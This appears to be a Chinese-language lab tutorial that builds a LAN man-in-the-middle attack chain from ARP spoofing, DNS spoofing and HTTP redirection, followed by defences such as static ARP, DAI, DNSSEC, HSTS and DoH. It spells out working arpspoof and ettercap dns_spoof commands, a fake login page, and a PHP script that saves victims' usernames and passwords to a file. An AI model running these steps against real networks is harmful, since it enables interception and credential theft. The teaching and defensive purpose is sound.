ARP欺骗与DNS劫持实战：构建局域网中间人攻击链与防御策略

1. 项目概述一次关于网络协议安全性的深度实践在网络安全的学习与实践中理解攻击原理是构建有效防御的基石。ARP欺骗、DNS欺骗与HTTP重定向这几个名词对于安全从业者来说是绕不开的经典课题。它们并非遥不可及的黑客“魔法”而是基于网络基础协议ARP、DNS、HTTP设计缺陷或信任模型的、可被利用的弱点。将这三者结合起来就能构建一个在局域网内近乎“隐形”的中间人攻击场景让目标用户在毫无察觉的情况下访问到攻击者精心构造的虚假页面从而窃取敏感信息。这个实验的目的绝非为了实施非法攻击而是为了让我们这些网络管理员、安全工程师或学习者能够从攻击者的视角审视网络深刻理解“信任”在网络通信中的脆弱性并最终将这些知识转化为加固网络边界的实际能力。这个实验模拟了一个典型的内部网络环境。假设我们身处一个共享的办公或实验室局域网中攻击者即我们进行实验的角色与目标用户处于同一网段。攻击的核心思路是首先通过ARP欺骗“毒化”目标主机和网关的ARP缓存让两者的流量都流经攻击者的机器然后在流量经过时对DNS查询进行欺骗将目标用户想要访问的合法域名解析到攻击者控制的服务器IP最后由这台服务器向用户返回一个伪造的HTTP页面。整个过程用户感觉只是正常打开了某个网站但实际上看到的内容、输入的账号密码都可能被攻击者截获或篡改。接下来我将拆解这个结合攻击的每一个技术环节分享从环境搭建到具体实现再到问题排查的完整过程与心得。2. 核心原理与攻击链拆解要成功实施这次结合攻击必须清晰地理解其中涉及的三层协议及其相互作用关系。这就像一套组合拳每一拳都要打在正确的位置上。2.1 ARP协议局域网通信的“电话簿”与它的信任危机ARP地址解析协议是局域网内IP地址到MAC地址的映射协议。你可以把它想象成一个动态的、基于广播的“电话簿”。当主机A想和主机BIP已知通信时它会向全网段广播“谁的IP是B的地址请告诉你的MAC地址。”主机B收到后会单播回复“我是B我的MAC地址是XX:XX:XX:XX:XX:XX。”主机A收到后就会把这个对应关系存入本地的ARP缓存表后续通信直接使用这个MAC地址。ARP欺骗或称ARP投毒正是利用了ARP协议的两个关键弱点无状态和无认证。协议本身不验证ARP回复报文的真实性谁最后回复主机就相信谁并更新缓存。攻击者可以持续地、高速地向目标主机发送伪造的ARP回复包声称“网关的IP地址对应的MAC是我攻击者的MAC地址。”同时也向网关发送伪造的ARP回复声称“目标主机的IP对应的MAC也是我攻击者的MAC地址。”这样一来目标主机和网关都错误地认为对方的MAC地址是攻击者的它们之间所有的双向流量都会先发送到攻击者的网卡再由攻击者决定是丢弃、修改还是转发。这就成功地将攻击者置入了通信链路中间成为了“中间人”。注意现代操作系统如Windows 10/11 最新版macOS和Linux内核都具备一定程度的ARP缓存保护机制例如设置静态ARP条目、忽略非预期的ARP更新等。在实验环境中为了成功演示可能需要暂时关闭这些防护功能如Windows的netsh interface ipv4 set interface “以太网” arpfilterdisable需管理员权限或者在攻击脚本中使用更激进的发送频率。这再次印证了原理学习最好在可控的虚拟化环境如VMware/VirtualBox构建的隔离网络中进行。2.2 DNS协议互联网的“导航系统”与它的误导风险DNS域名系统将人类可读的域名如www.example.com翻译成机器可读的IP地址。当ARP欺骗成功后目标主机的DNS查询请求也会流经攻击者主机。DNS欺骗的核心在于攻击者需要比真正的DNS服务器更快地返回一个伪造的DNS应答包。DNS协议基于UDP通常是无连接的并且查询包中包含一个16位的事务ID用于匹配请求和应答。要进行DNS欺骗攻击者需要嗅探到目标发出的DNS查询请求包括域名和事务ID。伪造一个DNS应答包其中源IP伪造成合法DNS服务器的IP目的IP是目标主机事务ID与查询包匹配并在“答案”部分提供攻击者指定的虚假IP地址。抢答在真正的DNS服务器回复之前将这个伪造的应答包发送给目标主机。由于网络延迟的存在以及本地DNS缓存的存在成功一次可影响一段时间这种攻击并非每次都成功但在一个被ARP欺骗控制的局域网内攻击者处于流量必经之路成功率会大大增加。更高级的做法是结合DNS服务器劫持或直接在本机运行一个伪造的DNS服务器如dnsmasq并配合ARP欺骗将目标的DNS请求流量重定向到这台假服务器上这样就能稳定地返回任何想要的解析结果。2.3 HTTP协议内容传输的“明信片”与重定向陷阱HTTP是超文本传输协议是我们浏览网页的基础。在本次结合攻击中HTTP层是最终达成攻击目的的地方。当DNS欺骗成功目标主机试图访问www.example.com时其TCP连接请求会发往攻击者伪造的IP地址也就是攻击者控制的服务器。此时攻击者有两种主要策略静态重定向在攻击者控制的Web服务器如Apache, Nginx上配置一个虚拟主机完全模仿目标网站的外观制作一个钓鱼登录页面。当用户访问时直接看到这个假页面。动态代理与篡改使用工具如mitmproxy作为透明代理。攻击者的机器转发用户的HTTP请求到真实的服务器获取真实响应后在内存中动态修改响应内容例如在页面中注入一段键盘记录JavaScript代码或者替换表单提交的action地址再将修改后的内容返回给用户。这种方式更隐蔽因为用户看到的绝大部分内容都是真实的。在我们的实验场景中为了清晰演示效果通常采用第一种静态重定向的方式搭建一个简单的钓鱼页面。2.4 攻击链全景图整个攻击流程可以串联如下信息收集攻击者扫描局域网确定目标主机和网关的IP地址。ARP投毒启动ARP欺骗工具持续向目标主机和网关发送伪造的ARP回复实现双向流量劫持。流量转发与嗅探在攻击者主机上开启内核IP转发功能让数据包能在网卡间流转同时开启嗅探捕获DNS查询。DNS欺骗对捕获到的特定域名查询如www.target-bank.com进行伪造应答将其IP指向攻击者自己搭建的Web服务器IP。HTTP服务与钓鱼在攻击者主机上运行Web服务器并部署伪造的登录页面。成果收割当目标用户访问被欺骗的域名时将进入钓鱼页面输入的信息会被发送到攻击者的服务器。3. 实验环境搭建与工具选型一个隔离、可控的实验环境是安全研究的前提。我强烈建议使用虚拟机来构建整个实验拓扑。3.1 实验拓扑设计我采用三台虚拟机通过VirtualBox的“内部网络”模式连接创建一个与宿主机完全隔离的虚拟局域网。攻击者 (Kali Linux)IP:192.168.56.101。预装了大量的安全测试工具。目标主机 (Windows 10 / Ubuntu)IP:192.168.56.102。模拟普通用户。网关/真实服务器 (可选 简易实验可不设)为了更真实可以设置一台Linux虚拟机作为网关192.168.56.1并开启路由转发和DNS服务。在基础实验中我们可以将网关抽象为虚拟网络本身的出口攻击主要针对目标主机与“外部”的通信。工具的选择至关重要好的工具能让我们更专注于原理理解而非环境调试。3.2 核心工具解析与配置1. ARP欺骗工具arpspoof(来自dsniff套件)arpspoof简单而直接是实施ARP欺骗的经典工具。# 安装 (在Kali上通常预装 若无则sudo apt install dsniff) # 欺骗目标主机(102) 使其认为攻击者(101)是网关(1) sudo arpspoof -i eth0 -t 192.168.56.102 192.168.56.1 # 欺骗网关(1) 使其认为攻击者(101)是目标主机(102) sudo arpspoof -i eth0 -t 192.168.56.1 192.168.56.102-i指定网卡接口。-t指定目标被欺骗者。最后一位参数是“我们想要冒充的IP”。两条命令需要分别在两个终端运行以实现双向欺骗。实操心得运行arpspoof后在攻击者机器上必须开启内核IP转发否则目标主机的网络会中断引起怀疑。开启命令sudo sysctl -w net.ipv4.ip_forward1。更好的做法是将其写入配置文件/etc/sysctl.conf。2. DNS欺骗工具ettercapettercap是一款功能强大的综合中间人攻击套件它集成了ARP欺骗、DNS欺骗、密码嗅探等多种功能。使用它的图形界面或命令行都可以方便地进行DNS欺骗。图形界面运行sudo ettercap -G 在“Sniff”菜单选择“Unified sniffing” 选择网卡。在“Hosts”菜单扫描并列出主机将网关IP添加到Target1目标主机IP添加到Target2。然后在“Mitm”菜单选择“ARP poisoning”。最后在“Plugins”菜单中启用dns_spoof插件。命令行与配置文件我更倾向于命令行因为可复现性强。# 首先 编辑ettercap的DNS欺骗配置文件 sudo nano /etc/ettercap/etter.dns # 添加一行 例如将百度域名指向攻击者IP *.baidu.com A 192.168.56.101 www.baidu.com A 192.168.56.101 # 保存后 运行ettercap进行ARP欺骗和DNS欺骗 sudo ettercap -T -q -i eth0 -M arp:remote /192.168.56.1// /192.168.56.102// -P dns_spoof-T使用文本界面。-q安静模式。-M arp:remote启动ARP欺骗双向。-P dns_spoof启用DNS欺骗插件。3. Web服务器Apache2或Python SimpleHTTPServer用于托管钓鱼页面。Apache2功能强大适合复杂的钓鱼页面。sudo apt install apache2 sudo systemctl start apache2 # 网页文件默认在 /var/www/html/Python3 HTTP服务器轻量快捷适合演示。# 在钓鱼页面所在目录执行 python3 -m http.server 80需要确保攻击者主机的80端口未被占用且能以root权限运行普通用户无法绑定1024以下端口。4. 钓鱼页面制作一个简单的钓鱼页面可以就是一个HTML文件包含一个模仿目标网站的登录表单表单的action属性指向攻击者服务器上的一个处理脚本如PHP。!DOCTYPE html html headtitle系统登录 - 仿冒页面/title/head body h2请登录您的账户/h2 form actionhttp://192.168.56.101/save.php methodpost input typetext nameusername placeholder用户名 input typepassword namepassword placeholder密码 button typesubmit登录/button /form /body /htmlsave.php脚本负责接收并保存或邮件发送窃取的凭证。4. 分步实操构建完整的攻击演示假设我们的目标是让192.168.56.102Win10的用户在访问www.baidu.com时进入我们搭建的钓鱼页面。4.1 阶段一网络环境准备与信息收集确认网络拓扑在三台虚拟机中分别使用ip addrLinux或ipconfigWindows确认IP地址分配正确并测试彼此能否ping通。关闭干扰服务在目标主机上暂时关闭防火墙和实时病毒防护仅实验环境避免其干扰ARP欺骗和后续的HTTP访问。记录关键信息网关IP192.168.56.1虚拟网络网关目标主机IP192.168.56.102攻击者IP192.168.56.101攻击者MAC地址使用ip link show eth0查看。4.2 阶段二实施ARP欺骗与开启流量转发在攻击者Kali机器上操作开启IP转发使攻击者主机成为“路由器”。sudo sysctl -w net.ipv4.ip_forward1启动第一个arpspoof进程欺骗目标主机。sudo arpspoof -i eth0 -t 192.168.56.102 192.168.56.1打开另一个终端启动第二个arpspoof进程欺骗网关。sudo arpspoof -i eth0 -t 192.168.56.1 192.168.56.102验证在目标主机上运行arp -a命令查看ARP缓存。你会发现网关192.168.56.1对应的MAC地址已经变成了攻击者Kali的MAC地址。此时目标主机依然可以正常上网因为攻击者开启了转发但所有流量都已流经Kali。4.3 阶段三配置并启动DNS欺骗编辑ettercap的DNS配置文件。sudo nano /etc/ettercap/etter.dns在文件末尾添加我们的欺骗规则。A记录表示将域名解析到IPv4地址。*.baidu.com A 192.168.56.101 www.baidu.com A 192.168.56.101这表示所有baidu.com的子域名以及www.baidu.com都将被解析到攻击者的IP192.168.56.101。启动ettercap同时进行ARP欺骗和DNS欺骗。由于我们已经用arpspoof做了ARP欺骗这里可以只启用DNS欺骗插件但为了流程完整ettercap也可以独立完成所有步骤。我们使用一个命令完成sudo ettercap -T -q -i eth0 -M arp:remote /192.168.56.1// /192.168.56.102// -P dns_spoof运行后ettercap会进入一个交互式文本界面显示嗅探到的连接。当目标主机进行DNS查询时相关记录会显示出来。4.4 阶段四部署钓鱼Web服务在攻击者机器上创建一个用于存放钓鱼页面的目录。mkdir ~/phishing_page cd ~/phishing_page使用上述HTML代码创建index.html。创建一个简单的PHP脚本来接收数据如果使用Apache且安装了PHP。sudo nano /var/www/html/save.php内容如下?php $username $_POST[username]; $password $_POST[password]; $file /var/www/html/stolen_data.txt; $data 时间: . date(Y-m-d H:i:s) . - 用户名: $username, 密码: $password\n; file_put_contents($file, $data, FILE_APPEND); // 记录后 可以重定向回真实网站或显示一个错误页面 降低怀疑 header(Location: https://www.baidu.com); exit(); ?确保Web服务器如Apache对/var/www/html/目录有写权限。启动Web服务器。如果使用Apache确保它正在运行。如果使用Python在钓鱼页面目录执行sudo python3 -m http.server 80。4.5 阶段五触发与验证攻击效果在目标主机192.168.56.102上打开浏览器尝试访问http://www.baidu.com。预期结果浏览器地址栏显示的是www.baidu.com但页面内容却是我们制作的简单登录表单。这是因为DNS欺骗生效域名解析到了我们的服务器。在攻击者的ettercap界面你应该能看到相关的DNS查询和欺骗记录。在目标主机上可以使用nslookup www.baidu.com命令验证会发现解析出的IP是192.168.56.101而非真实的百度IP。模拟用户行为在钓鱼页面输入测试用户名和密码并提交。攻击者验证检查攻击者服务器上的/var/www/html/stolen_data.txt文件应该能看到刚刚提交的凭证信息被记录了下来。至此一个完整的ARP欺骗DNS欺骗HTTP重定向的结合攻击实验就完成了。整个过程清晰地展示了从链路层到应用层攻击者是如何一步步掌控网络会话的。5. 深度防御如何检测与防范此类攻击理解了攻击防御就有了方向。防御措施需要层层布防对应攻击链的每一个环节。5.1 防御ARP欺骗静态ARP绑定在关键主机如服务器和网关上静态绑定IP-MAC地址对应关系。这是最有效但管理成本较高的方法。Windows:arp -s IP地址 MAC地址Linux:arp -s IP地址 MAC地址交换机端口安全在企业交换机上配置端口安全策略限制每个端口学习的MAC地址数量或直接绑定端口与MAC地址防止ARP欺骗报文泛滥。部署ARP防护软件/功能使用如ARPWatch等工具监控局域网内ARP表的变化发现异常时告警。启用操作系统自带的ARP防护功能如前述的Windows ARP过滤。网络分段与VLAN将网络划分为更小的子网或VLAN限制广播域的范围从而缩小ARP欺骗可能影响的范围。采用动态ARP检测DAI这是高级交换机的安全功能。交换机会维护一个IP-MAC-Port的信任绑定表通常通过DHCP Snooping获得并拦截所有ARP报文进行验证非法的ARP报文将被丢弃。5.2 防御DNS欺骗使用DNSSECDNS安全扩展通过对DNS数据进行数字签名验证数据的真实性和完整性。这是从根本上解决DNS欺骗的方案但部署需要上下游支持。配置可信的DNS服务器客户端强制指定使用内部可信的DNS服务器如企业自建的DNS或知名的公共DNS如8.8.8.8,1.1.1.1并禁用来自其他源的DNS响应。本地HOSTS文件对于极其重要的少数网站可以在本地HOSTS文件中设置静态域名解析绕过DNS查询。但这不适合大规模应用。使用HTTPS虽然HTTPS不能防止DNS欺骗用户仍可能被导向假冒IP的服务器但如果假冒服务器没有有效的、对应域名的SSL证书浏览器会发出严重的证书警告从而阻止用户继续访问。这迫使攻击者还需要攻克证书体系如实施SSL剥离攻击或拥有伪造证书大大增加了攻击难度。DNS-over-HTTPS (DoH) 或 DNS-over-TLS (DoT)这两种协议将DNS查询加密并通过HTTPS/TLS通道传输防止了局域网内的嗅探和篡改。5.3 防御HTTP重定向与中间人攻击强制使用HTTPS网站全面启用HTTPS并启用HSTSHTTP严格传输安全策略强制浏览器只能通过加密的HTTPS连接访问网站防止HTTP重定向和SSL剥离攻击。用户安全教育这是最后也是最关键的一环。教育用户始终注意浏览器地址栏的锁形标志和域名是否正确。不要忽略浏览器的证书警告。对突然出现的、要求重新登录的页面保持警惕。重要操作尽量在确认网络环境安全后进行。网络监控与入侵检测部署IDS/IPS系统设置规则检测异常的ARP流量、DNS流量模式以及已知的中间人攻击工具特征。6. 实验中的常见问题、排查与进阶思考即使按照步骤操作实验过程中也难免遇到问题。以下是我在多次复现中总结的一些常见坑点及解决方法。6.1 常见问题排查表问题现象可能原因排查步骤与解决方案目标主机在ARP欺骗后完全断网攻击者主机未开启IP转发。在攻击者Kali上执行sudo sysctl -w net.ipv4.ip_forward1。检查/proc/sys/net/ipv4/ip_forward文件内容是否为1。DNS欺骗不生效目标仍访问真实网站1.etter.dns配置错误或未生效。2. 目标主机有DNS缓存。3. 攻击流程顺序错误。1. 检查etter.dns文件语法确保域名和IP正确。重启ettercap。2. 在目标主机上执行ipconfig /flushdns(Windows) 或sudo systemd-resolve --flush-caches(Linux systemd)。3. 确保先完成ARP欺骗网络流量已流经攻击者再启用DNS欺骗。访问被欺骗域名时浏览器显示连接被拒绝攻击者主机上的Web服务器未正常运行或端口被占用。1. 检查Web服务进程sudo systemctl status apache2或 sudo netstat -tlnpettercap运行时提示权限问题未以root权限运行。DNS欺骗和ARP欺骗都需要底层网络操作务必使用sudo。目标主机操作系统有ARP防护现代操作系统默认启用了ARP保护机制。在实验环境中临时关闭相关防护。Windows可使用前述netsh命令对于Linux检查/proc/sys/net/ipv4/conf/*/arp_ignore等参数。虚拟机网络模式导致攻击失败使用了NAT或桥接模式ARP广播受限。将三台虚拟机的网卡都设置为“内部网络”如intnet并确保在同一网络内。6.2 进阶思考与实验扩展在成功完成基础实验后可以尝试以下扩展加深理解SSL/TLS剥离攻击在HTTP重定向的基础上尝试使用sslstrip等工具将用户试图访问的HTTPS连接降级为HTTP从而让中间人攻击对HTTPS网站也生效。这需要结合更复杂的流量操纵。无线网络中的类似攻击在Wi-Fi环境中类似的技术是“邪恶双子”攻击。攻击者搭建一个与合法Wi-Fi同名的开放热点诱使用户连接然后进行DNS欺骗和HTTP重定向。思考这与有线网络ARP欺骗的异同。防御实验在同一个实验环境中尝试部署防御措施。例如在目标主机上设置静态ARP绑定然后再次运行攻击脚本观察攻击是否失效。或者在交换机如果使用可网管交换机模拟上配置DAI功能。使用更现代的工具尝试使用bettercap替代ettercap和arpspoof。bettercap是一个模块化的、功能更强的中间人攻击框架使用Go语言编写在活跃度和功能上有其优势。6.3 法律与道德红线我必须再次强调所有这些技术知识仅限用于授权的安全测试、教学研究或个人在完全隔离的实验室环境中学习。未经授权对任何网络或系统进行扫描、渗透、攻击都是违法行为将面临严重的法律后果。作为安全从业者或学习者我们的目标是利用这些知识去发现漏洞、加固系统、提升整体安全水位这才是这些技术背后真正的价值所在。这次从ARP欺骗到HTTP重定向的完整链条实验就像一次精密的网络外科手术让我们清晰地看到了数据包从本机发出后在到达目的地之前可能经历的种种风险。只有亲自动手拆解过这个链条你才能真正理解为什么企业网络需要划分VLAN、为什么重要网站必须全站HTTPS、为什么不能随意连接陌生的Wi-Fi。安全不是一个模糊的概念它是由一个个具体的协议、配置和操作堆砌起来的城墙而理解攻击就是绘制这张城墙的蓝图。